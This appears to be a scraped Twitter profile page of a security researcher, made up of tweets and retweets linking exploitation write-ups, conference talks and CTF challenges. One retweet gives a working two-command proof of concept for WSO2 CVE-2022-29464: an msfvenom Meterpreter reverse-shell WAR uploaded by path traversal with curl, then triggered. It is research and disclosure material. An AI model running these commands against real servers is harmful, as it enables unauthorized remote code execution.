Network Intrusion Specialist
Joined October 2008
- Tweets 3,248
- Following 389
- Followers 9,199
- Likes 601
14 Photos and videos
So ends an era of the New Zealand scene that lasted well over a decade. Shout outs to all of the people who worked to contribute to this epic period of history. Congrats of course to those founders and owners that made it through to this point. Waiting now for the next wave.
14
3,710
antic0de retweeted
22 Sep 2022
The first 15 minutes of this weeks @riskybusiness is why we build @ThinkstCanary (and why it works).
- Attackers know there’s value in arb file shares;
- Attackers know there are creds in random text files.
Canaries && Canarytokens let defenders know when they are being touched
4
28
The Aruba AP CLI support password calculation script from my #defcon30 presentation is available here:
github.com/dozernz/bugstropi…
3
8
16
Can you bypass authentication by exploiting a vulnerability? 10$ for first solver! 💢🔥
octagon.net/chal/3.php
45
106
781
RT @CyberCX: Congrats to our team members selected to join Team Oceania at the inaugural International #Cybersecurity Challenge
CyberCX is…
1
antic0de retweeted
22 Apr 2022
From a VR student today on our ROP chain lessons. I'm dying 😂:
"This week's been like"
19
612
2,410
antic0de retweeted
22 Apr 2022
CVE-2022-29464 PoC for this in two commands...
1. msfvenom -p java/meterpreter/reverse_tcp -f war lhost=192.168.0.6 | curl -kv https://192.168.0.6:9443/fileupload/toolsAny -F ../../../../repository/deployment/server/webapps/x.war=@-
2. curl -kv https://192.168.0.6:9443/x
:/
22 Apr 2022
On WSO2 CVE-2022-29464... you'll definitely want to check for deployed WAR files in addition to JSP. Confirmed a full Java Meterpreter shell for this.
7
74
240
My offensivecon 2022 keynote “rules to hack by” is now available on video at the link below
21 Apr 2022
The great @mdowd keynote for offensivecon hit YouTube finally youtu.be/7Ysy6iA2sqA
4
53
170
antic0de retweeted
22 Apr 2022
If you are using JWT Java EC, you should probably grep your logs for MAYCAQACAQA
2
11
66
antic0de retweeted
21 Apr 2022
I have been playing with KernelCallbackTable process injection lately and here's something I wanted to share.
#redteam #maldev #infosec
captmeelo.com/redteam/maldev…
5
150
395
antic0de retweeted
13 Apr 2022
Launch Update: Kawaiicon 2 are continuing to target July 1-2 2022 for launch. ✨Wave 1 of ticket sales to open midday Friday.✨ This is not a drill!
What will Kawaiicon 2 look like this year? SO GLAD YOU ASKED.
5
35
89
A few people commented that it was annoying having to login to SlideShare to d/l, so I've made them available on github here: github.com/mdowd79/presentat…
I have uploaded slide decks for 4 keynotes that I have done in the last few years, including the offensivecon 2022 keynote ("Rules to Hack By"). They are all here: slideshare.net/search/slides…
16
61
antic0de retweeted
10 Mar 2022
12 ROP chains later - from CVE-2019-0567 crash POC to code execution.
ASLR, DEP, & CFG bypass ACG bypass using (since-patched) CVE-2017-8637 to abuse the way Chakra-based Edge handled (pun intended) supplying a handle from the out-of-process JIT server to a content process.
5
84
387
antic0de retweeted
8 Mar 2022
Thrilled to share my new blog post: Put an io_uring on it: Exploiting the Linux kernel. Follow me while I learn a new kernel subsystem its attack surface, find an 0day, build an exploit, come up with some new tricks. I go deep and demystify the process
graplsecurity.com/post/iou-r…
41
599
2,232
Guys & girls!
Exactly a year ago I promised over 15 bugs in win32k.
You're welcome to read and find out about my biggest research so far: #win32k #SmashTheRef bug class - github.com/gdabah/win32k-bug…
Check out the paper and the POCs, there are some crazy stuff going on. Promise!
12
333
749
We are pleased to announce tmp.0ut Volume 2
tmpout.sh/2/
ALT table of contents of tmp.0ut volume 2 linked above
16
565
1,580
antic0de retweeted
21 Feb 2022
Ever wanted to debug your microcontroller over USB-C?
(I'm talking JTAG/SWD, not just USB!) If you already have a USB-C connector, there's no need to have an additional connector to program (or tag-connect pads, which are super nice)
Here's one way to do it: 🧵
21
151
764
antic0de retweeted
10 Feb 2022
The show will go on! Droppy has secured a new lair for #CrikeyCon at the RNA Showgrounds on 3rd September! Check crikeycon.com for updates as we have them!
11
22
antic0de retweeted
31 Jan 2022
I just posted a write-up on how I leaked uninitialized memory (e.g., other users' HTTP requests/responses) from Fastly using a bug in the H2O webserver. Also, there you can learn a fraction of how HTTP/3 QUIC works)
medium.com/@emil.lerner/leak…
14
265
803